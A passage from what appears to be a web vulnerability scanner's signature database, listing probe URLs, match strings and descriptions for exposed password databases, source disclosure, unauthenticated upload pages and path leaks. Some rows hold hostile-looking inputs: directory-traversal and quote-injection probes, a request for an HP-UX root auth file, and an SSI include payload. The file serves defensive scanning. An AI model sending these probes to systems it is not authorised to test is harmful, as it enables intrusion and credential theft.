log\",\"\",\"\"\n\"000165\",\"0\",\"3\",\"/web-console/ServerInfo.jsp%00\",\"GET\",\"<\\%=\",\"\",\"\",\"\",\"\",\"JBoss 3.2.1 with jetty seems to disclose source code.\",\"\",\"\"\n\"000166\",\"0\",\"3\",\"/global.asa\",\"GET\",\"RUNAT\",\"\",\"\",\"\",\"\",\"The global.asa file was retrieved, which may contain sensitive information.  Map the .asa extension to the proper dll.\",\"\",\"\"\n\"000167\",\"0\",\"23\",\"/exchange/lib/AMPROPS.INC\",\"GET\",\"Logon functions\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000168\",\"0\",\"23\",\"/exchange/lib/DELETE.INC\",\"GET\",\"deleting objects\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000169\",\"0\",\"23\",\"/exchange/lib/GETREND.INC\",\"GET\",\"GetRenderer functions\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000170\",\"0\",\"23\",\"/exchange/lib/GETWHEN.INC\",\"GET\",\"functions to construct\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000171\",\"0\",\"23\",\"/exchange/lib/JSATTACH.INC\",\"GET\",\"Attachment Javascript\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000172\",\"0\",\"23\",\"/exchange/lib/JSROOT.INC\",\"GET\",\"Javascript Functions\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000173\",\"0\",\"23\",\"/exchange/lib/JSUTIL.INC\",\"GET\",\"Common Javascript\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000174\",\"0\",\"23\",\"/exchange/lib/LANG.INC\",\"GET\",\"localized strings\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000175\",\"0\",\"23\",\"/exchange/lib/logon.inc\",\"GET\",\"Logon functions\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000176\",\"0\",\"23\",\"/exchange/lib/PAGEUTIL.INC\",\"GET\",\"functions that help\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000177\",\"0\",\"23\",\"/exchange/lib/PUBFLD.INC\",\"GET\",\"Anonymous Published\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000178\",\"0\",\"23\",\"/exchange/lib/RENDER.INC\",\"GET\",\"Rendering functions\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000179\",\"0\",\"23\",\"/exchange/lib/SESSION.INC\",\"GET\",\"Session Management\",\"\",\"\",\"\",\"\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000180\",\"0\",\"5\",\"/ows/restricted%2eshow\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.\",\"\",\"\"\n\"000181\",\"0\",\"5\",\"/WEB-INF./web.xml\",\"GET\",\"j2ee\",\"\",\"\",\"\",\"\",\"Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.ltd.uk/advisories/wp-02-0002.txt\",\"\",\"\"\n\"000182\",\"0\",\"7\",\"/view_source.jsp\",\"GET\",\"200\",\"License Exception\",\"\",\"\",\"\",\"Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \\..\\ directory traversal. This script may be vulnerable.\",\"\",\"\"\n\"000183\",\"0\",\"8\",\"/w-agora/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.\",\"\",\"\"\n\"000184\",\"42680\",\"a\",\"/vider.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MySimpleNews may allow deleting of news items without authentication.\",\"\",\"\"\n\"000185\",\"0\",\"a\",\"/exchange/root.asp?acs=anon\",\"GET\",\"\\/exchange\\/logonfrm\\.asp\",\"\",\"\",\"\",\"\",\"This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc\",\"\",\"\"\n\"000186\",\"6181\",\"a\",\"/officescan/cgi/cgiChkMasterPwd.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.\",\"\",\"\"\n\"000187\",\"0\",\"b\",\"/%NETHOOD%/\",\"GET\",\"Microsoft Windows Network\",\"\",\"\",\"\",\"\",\"The machine may be infected with the Bugbear.B virus. http://www.f-secure.com/v-descs/bugbear_b.shtml\",\"\",\"\"\n\"000188\",\"0\",\"d\",\"@CGIDIRSastrocam.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Astrocam 1.4.1 contained buffer overflow BID-4684. Prior to 2.1.3 contained unspecified security bugs\",\"\",\"\"\n\"000189\",\"0\",\"de\",\"@CGIDIRSbadmin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.\",\"\",\"\"\n\"000190\",\"2017\",\"de\",\"@CGIDIRSboozt/admin/index.cgi?section=5&input=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Boozt CGI may have a buffer overflow. Upgrade to a version newer than 0.9.8alpha.\",\"\",\"\"\n\"000191\",\"0\",\"de\",\"@CGIDIRSezadmin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of this CGI are vulnerable to a buffer overflow.\",\"\",\"\"\n\"000192\",\"0\",\"d\",\"@CGIDIRSezboard.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of this CGI are vulnerable to a buffer overflow.\",\"\",\"\"\n\"000193\",\"0\",\"d\",\"@CGIDIRSezman.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of this CGI are vulnerable to a buffer overflow.\",\"\",\"\"\n\"000194\",\"11740\",\"d\",\"@CGIDIRSfoxweb.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.\",\"\",\"\"\n\"000195\",\"11741\",\"d\",\"@CGIDIRSfoxweb.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.\",\"\",\"\"\n\"000196\",\"0\",\"d\",\"@CGIDIRSmgrqcgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.\",\"\",\"\"\n\"000197\",\"0\",\"d\",\"@CGIDIRSwconsole.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"It may be possible to overflow this dll with 1024 bytes of data.\",\"\",\"\"\n\"000198\",\"0\",\"d\",\"@CGIDIRSwebplus.exe?about\",\"GET\",\"Product Information\",\"\",\"\",\"\",\"\",\"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Versions prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow.\",\"\",\"\"\n\"000199\",\"0\",\"d\",\"/pbserver/pbserver.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/ms00-094.asp\",\"\",\"\"\n\"000200\",\"0\",\"0\",\"/administrator/gallery/uploadimage.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.\",\"\",\"\"\n\"000201\",\"0\",\"0\",\"/pafiledb/includes/team/file.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"paFileDB 3.1 and below may allow file upload without authentication.\",\"\",\"\"\n\"000202\",\"0\",\"0\",\"/phpEventCalendar/file_upload.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"phpEventCalendar 1.1 and prior are vulnerable to file upload bug.\",\"\",\"\"\n\"000203\",\"0\",\"0\",\"/servlet/com.unify.servletexec.UploadServlet\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"This servlet allows attackers to upload files to the server.\",\"\",\"\"\n\"000204\",\"0\",\"0\",\"@CGIDIRSuploader.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to upload files to the server and then execute them.\",\"\",\"\"\n\"000205\",\"0\",\"0\",\"/scripts/cpshost.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Posting acceptor possibly allows you to upload files\",\"\",\"\"\n\"000206\",\"0\",\"0\",\"/scripts/repost.asp\",\"GET\",\"Here is your upload status\",\"\",\"\",\"\",\"\",\"This allows uploads to /users. Create /users and give web user read only access.\",\"\",\"\"\n\"000207\",\"0\",\"0\",\"/upload.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000208\",\"0\",\"0\",\"/uploadn.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000209\",\"0\",\"0\",\"/uploadx.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000210\",\"0\",\"0\",\"/wa.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000211\",\"0\",\"1\",\"/basilix/compose-attach.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads\",\"\",\"\"\n\"000212\",\"0\",\"1\",\"/server/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Possibly Macromedia JRun or CRX WebDAV upload\",\"\",\"\"\n\"000213\",\"0\",\"1\",\"@CGIDIRSfpsrvadm.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Potentially vulnerable CGI program.\",\"\",\"\"\n\"000214\",\"0\",\"1be\",\"/siteminder/smadmin.html\",\"GET\",\"Admin Login\",\"\",\"\",\"\",\"\",\"SiteMinder admin login page available.\",\"\",\"\"\n\"000215\",\"0\",\"1b\",\"/vgn/ac/data\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000216\",\"0\",\"1b\",\"/vgn/ac/delete\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000217\",\"0\",\"1b\",\"/vgn/ac/edit\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000218\",\"0\",\"1b\",\"/vgn/ac/esave\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000219\",\"0\",\"1b\",\"/vgn/ac/fsave\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000220\",\"0\",\"1b\",\"/vgn/ac/index\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000221\",\"0\",\"1b\",\"/vgn/asp/MetaDataUpdate\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000222\",\"0\",\"1b\",\"/vgn/asp/previewer\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000223\",\"0\",\"1b\",\"/vgn/asp/status\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000224\",\"0\",\"1b\",\"/vgn/asp/style\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000225\",\"0\",\"1b\",\"/vgn/errors\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000226\",\"0\",\"1b\",\"/vgn/jsp/controller\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000227\",\"0\",\"1b\",\"/vgn/jsp/errorpage\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000228\",\"0\",\"1b\",\"/vgn/jsp/initialize\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000229\",\"0\",\"1b\",\"/vgn/jsp/jspstatus\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000230\",\"0\",\"1b\",\"/vgn/jsp/jspstatus56\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000231\",\"0\",\"1b\",\"/vgn/jsp/metadataupdate\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000232\",\"0\",\"1b\",\"/vgn/jsp/previewer\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000233\",\"0\",\"1b\",\"/vgn/jsp/style\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000234\",\"0\",\"1b\",\"/vgn/legacy/edit\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000235\",\"0\",\"1b\",\"/vgn/login\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette server may allow user enumeration based on the login attempts to this file.\",\"\",\"\"\n\"000236\",\"0\",\"2\",\"/webtop/wdk/samples/index.jsp\",\"GET\",\"WDK Fusion Samples\",\"\",\"\",\"\",\"\",\"Documentum Webtop Example Code\",\"\",\"\"\n\"000237\",\"0\",\"2\",\"@CGIDIRS.cobalt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May allow remote admin of CGI scripts.\",\"\",\"\"\n\"000238\",\"0\",\"2\",\"/WEB-INF/web.xml\",\"GET\",\"<web-app\",\"\\<servlet\",\"200\",\"\",\"\",\"JRUN default file found.\",\"\",\"\"\n\"000239\",\"35707\",\"23\",\"/forum/admin/wwforum.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web Wiz Forums password database found.\",\"\",\"\"\n\"000240\",\"0\",\"23\",\"/fpdb/shop.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"000241\",\"52975\",\"23\",\"/guestbook/admin/o12guest.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.\",\"\",\"\"\n\"000242\",\"15971\",\"23\",\"/midicart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MIDICART database is available for browsing. This should not be allowed via the web server.\",\"\",\"\"\n\"000243\",\"15971\",\"23\",\"/MIDICART/midicart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MIDICART database is available for browsing. This should not be allowed via the web server.\",\"\",\"\"\n\"000244\",\"41850\",\"23\",\"/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MPCSoftWeb Guest Book passwords retrieved.\",\"\",\"\"\n\"000245\",\"0\",\"23\",\"/news/news.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web Wiz Site News release v3.06 admin password database is available and unencrypted.\",\"\",\"\"\n\"000246\",\"420\",\"23\",\"/newuser?Image=../../database/rbsserv.mdb\",\"GET\",\"SystemErrorsPerHour\",\"\",\"\",\"\",\"\",\"The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000247\",\"0\",\"23\",\"/shopdbtest.asp\",\"GET\",\"xDatabase\",\"\",\"\",\"\",\"\",\"VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).\",\"\",\"\"\n\"000248\",\"53413\",\"23\",\"/shopping300.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.\",\"\",\"\"\n\"000249\",\"53413\",\"23\",\"/shopping400.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.\",\"\",\"\"\n\"000250\",\"15971\",\"23\",\"/shoppingdirectory/midicart.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MIDICART database is available for browsing. This should not be allowed via the web server.\",\"\",\"\"\n\"000251\",\"17113\",\"23\",\"/SilverStream/Meta/Tables/?access-mode=text\",\"GET\",\"_DBProduct\",\"\",\"\",\"\",\"\",\"The SilverStream database structure is available for remote viewing.\",\"\",\"\"\n\"000252\",\"4398\",\"23\",\"/database/db2000.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.\",\"\",\"\"\n\"000253\",\"319\",\"28\",\"@CGIDIRSmailit.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sambar may allow anonymous email to be sent from any host via this CGI.\",\"\",\"\"\n\"000254\",\"0\",\"3\",\"@CGIDIRSsearch\",\"GET\",\"=sourcedir\",\"\",\"\",\"\",\"\",\"Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value).\",\"\",\"\"\n\"000255\",\"0\",\"3\",\"/doc/webmin.config.notes\",\"GET\",\"login and password\",\"\",\"\",\"\",\"\",\"Webmin config file found, may contain Webmin ID/Password. Typically runs on port 10000.\",\"\",\"\"\n\"000256\",\"0\",\"3\",\"/error/HTTP_NOT_FOUND.html.var\",\"GET\",\"Available variants\",\"\",\"\",\"\",\"\",\"Apache reveals file system paths when invalid error documents are requested.\",\"\",\"\"\n\"000257\",\"0\",\"3\",\"/oem_webstage/cgi-bin/oemapp_cgi\",\"GET\",\"This script\",\"\",\"\",\"\",\"\",\"Oracle reveals the CGI source by prepending /oem_webstage to CGI URLs.\",\"\",\"\"\n\"000258\",\"0\",\"3\",\"@ADMINconfig.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000259\",\"0\",\"3\",\"@CGIDIRS.access\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"000260\",\"11093\",\"3\",\"@CGIDIRS%2e%2e/abyss.conf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/\",\"\",\"\"\n\"000261\",\"2396\",\"3\",\"@CGIDIRSdata/fetch.php?page=\",\"GET\",\"mysql_num_rows\",\"\",\"\",\"\",\"\",\"Stellar Docs allows remote users to see file system paths. BID-8385.\",\"\",\"\"\n\"000262\",\"0\",\"3\",\"@CGIDIRSempower?DB=whateverwhatever\",\"GET\",\"db name whateverwhatever of directory \\/\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to learn the full system path to your web directory.\",\"\",\"\"\n\"000263\",\"0\",\"3\",\"@CGIDIRSmrtg.cgi?cfg=blah\",\"GET\",\"Cannot find the given config file\",\"\",\"\",\"\",\"\",\"Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000264\",\"5734\",\"3\",\"@CGIDIRSstore/agora.cgi?page=whatever33.html\",\"GET\",\"FILE:\",\"\",\"\",\"\",\"\",\"Agora.cgi gives detailed error messages including file system paths.\",\"\",\"\"\n\"000265\",\"59658\",\"3\",\"/?mod=node&nid=some_thing&op=view\",\"GET\",\"\\/node\\.module\\.php\",\"\",\"\",\"\",\"\",\"Sage 1.0b3 may reveal system paths with invalid module names.\",\"\",\"\"\n\"000266\",\"59658\",\"3\",\"/?mod=some_thing&op=browse\",\"GET\",\"Cannot instantiate non-existent class\",\"\",\"\",\"\",\"\",\"Sage 1.0b3 reveals system paths with invalid module names.\",\"\",\"\"\n\"000267\",\"7170\",\"3\",\"/article.php?article=4965&post=1111111111\",\"GET\",\"Unable to jump to row\",\"\",\"\",\"\",\"\",\"PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent.\",\"\",\"\"\n\"000268\",\"0\",\"3\",\"/blah123.php\",\"GET\",\"Failed opening \",\"\",\"\",\"\",\"\",\"PHP is configured to give descriptive error messages that can reveal file system paths.\",\"\",\"\"\n\"000269\",\"12649\",\"3\",\"/categorie.php3?cid=june\",\"GET\",\"Unable to jump to row\",\"\",\"\",\"\",\"\",\"Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.\",\"\",\"\"\n\"000270\",\"3233\",\"3\",\"/CFIDE/probe.cfm\",\"GET\",\"coldfusion\\.tagext\\.lang\",\"\",\"\",\"\",\"\",\"Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info\",\"\",\"\"\n\"000271\",\"0\",\"3\",\"/contents.php?new_language=elvish&mode=select\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Requesting a file with an invalid language selection from DC Portal may reveal the system path.\",\"\",\"\"\n\"000272\",\"0\",\"3\",\"/download.php?op=viewdownload\",\"GET\",\"Failed opening\",\"\",\"\",\"\",\"\",\"PHP-Nuke allows file system paths to be revealed.\",\"\",\"\"\n\"000273\",\"0\",\"3\",\"/download.php?op=viewdownload\",\"GET\",\"Fatal error\",\"\",\"\",\"\",\"\",\"PHP-Nuke allows file system paths to be revealed.\",\"\",\"\"\n\"000274\",\"59400\",\"3\",\"/examples/basic/servlet/HelloServlet\",\"GET\",\"The source of this servlet is in\",\"\",\"\",\"\",\"\",\"Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet.\",\"\",\"\"\n\"000275\",\"5289\",\"3\",\"/home.php?arsc_language=elvish\",\"GET\",\"Failed opening '\",\"\",\"\",\"\",\"\",\"ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified.\",\"\",\"\"\n\"000276\",\"0\",\"3e\",\"/hostadmin/?page='\",\"GET\",\"C:\\\\\\\\\",\"\",\"\",\"\",\"\",\"Host Admin reveals install location and other sensitive information.\",\"\",\"\"\n\"000277\",\"0\",\"3e\",\"/hostadmin/?page='\",\"GET\",\"D:\\\\\\\\\",\"\",\"\",\"\",\"\",\"Host Admin reveals install location and other sensitive information.\",\"\",\"\"\n\"000278\",\"0\",\"3\",\"/index.php?file=index.php\",\"GET\",\"Fatal error:\",\"\",\"\",\"\",\"\",\"PHP-Nuke 5.4 allows file system paths to be shown in error messages.\",\"\",\"\"\n\"000279\",\"40589\",\"3\",\"/jgb_eng_php3/cfooter.php3\",\"GET\",\"Fatal error\",\"\",\"\",\"\",\"\",\"Justice Guestbook may reveal file system paths in error messages.\",\"\",\"\"\n\"000280\",\"0\",\"3\",\"/JUNK(5).csp\",\"GET\",\"File not found: \\/\",\"\",\"\",\"\",\"\",\"Invalid files with .csp extension reveal the file system path to the web root.\",\"\",\"\"\n\"000281\",\"0\",\"3\",\"/modules.php?name=Downloads&d_op=viewdownload\",\"GET\",\"Failed opening\",\"\",\"\",\"\",\"\",\"PHP-Nuke allows file system paths to be revealed.\",\"\",\"\"\n\"000282\",\"0\",\"3\",\"/modules.php?name=Downloads&d_op=viewdownload\",\"GET\",\"Fatal error\",\"\",\"\",\"\",\"\",\"PHP-Nuke allows file system paths to be revealed.\",\"\",\"\"\n\"000283\",\"0\",\"3\",\"/modules.php?op=modload&name=0&file=0\",\"GET\",\"Failed opening \",\"\",\"\",\"\",\"\",\"PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.\",\"\",\"\"\n\"000284\",\"0\",\"3\",\"/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=\",\"GET\",\"non-object in\",\"\",\"\",\"\",\"\",\"Postnuke v0.7.2.3-Phoenix and below reveal the file system path.\",\"\",\"\"\n\"000285\",\"0\",\"3\",\"/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink\",\"GET\",\"Failed opening \",\"\",\"\",\"\",\"\",\"PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.\",\"\",\"\"\n\"000286\",\"2394\",\"3\",\"/path/nw/article.php?id='\",\"GET\",\"c:\\/\",\"\",\"\",\"\",\"\",\"News Wizard 2.0 reveals the file system path.\",\"\",\"\"\n\"000287\",\"2394\",\"3\",\"/path/nw/article.php?id='\",\"GET\",\"d:\\/\",\"\",\"\",\"\",\"\",\"News Wizard 2.0 reveals the file system path.\",\"\",\"\"\n\"000288\",\"6467\",\"3\",\"/pw/storemgr.pw\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.\",\"\",\"\"\n\"000289\",\"4245\",\"3\",\"/rtm.log\",\"GET\",\"HttpPost Retry\",\"\",\"\",\"\",\"\",\"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.\",\"\",\"\"\n\"000290\",\"43917\",\"3\",\"/scozbook/view.php?PG=whatever\",\"GET\",\"Warning:\\sSupplied\",\"\",\"\",\"\",\"\",\"ScozBook Beta 1.1 may reveal file system paths in error messages.\",\"\",\"\"\n\"000291\",\"0\",\"3\",\"/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.\",\"<!--#include virtual=\\\"/index.jsp\\\"-->\",\"\"\n\"000292\",\"0\",\"3\",\"/shopa_sessionlist.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.\",\"\",\"\"\n\"000293\",\"53303\",\"3\",\"/simplebbs/users/users.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.\",\"\",\"\"\n\"000294\",\"44056\",\"3\",\"/sips/sipssys/users/a/admin/user\",\"GET\",\"Password\",\"\",\"200\",\"\",\"\",\"SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.\",\"\",\"\"\n\"000295\",\"3093\",\"2\",\"/tcb/files/auth/r/root\",\"GET\",\"u_pwd\",\"\",\"\",\"\",\"\",\"HP-UX has the tcb auth file system on the web server.\",\"\",\"\"\n\"000296\",\"0\",\"3\",\"@TYPO3typo3conf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may contain sensitive TYPO3 files.\",\"\",\"\"\n\"000297\",\"0\",\"3\",\"@TYPO3typo3conf/database.sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"TYPO3 SQL file found.\",\"\",\"\"\n\"000298\",\"0\",\"3\",\"@TYPO3typo3conf/localconf.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"TYPO3 config file found.\",\"\",\"\"\n\"000299\",\"53386\",\"3\",\"/vchat/msg.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VChat allows user information to be retrieved.\",\"\",\"\"\n\"000300\",\"4907\",\"3\",\"/vgn/license\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette server license file found.\",\"\",\"\"\n\"000301\",\"3092\",\"3\",\"/web.config\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config file is accessible.\",\"\",\"\"\n\"000302\",\"3233\",\"3\",\"/webamil/test.php?mode=phpinfo\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000303\",\"0\",\"3\",\"/webcart-lite/config/import.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.\",\"\",\"\"\n\"000304\",\"0\",\"3\",\"/webcart-lite/orders/import.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the 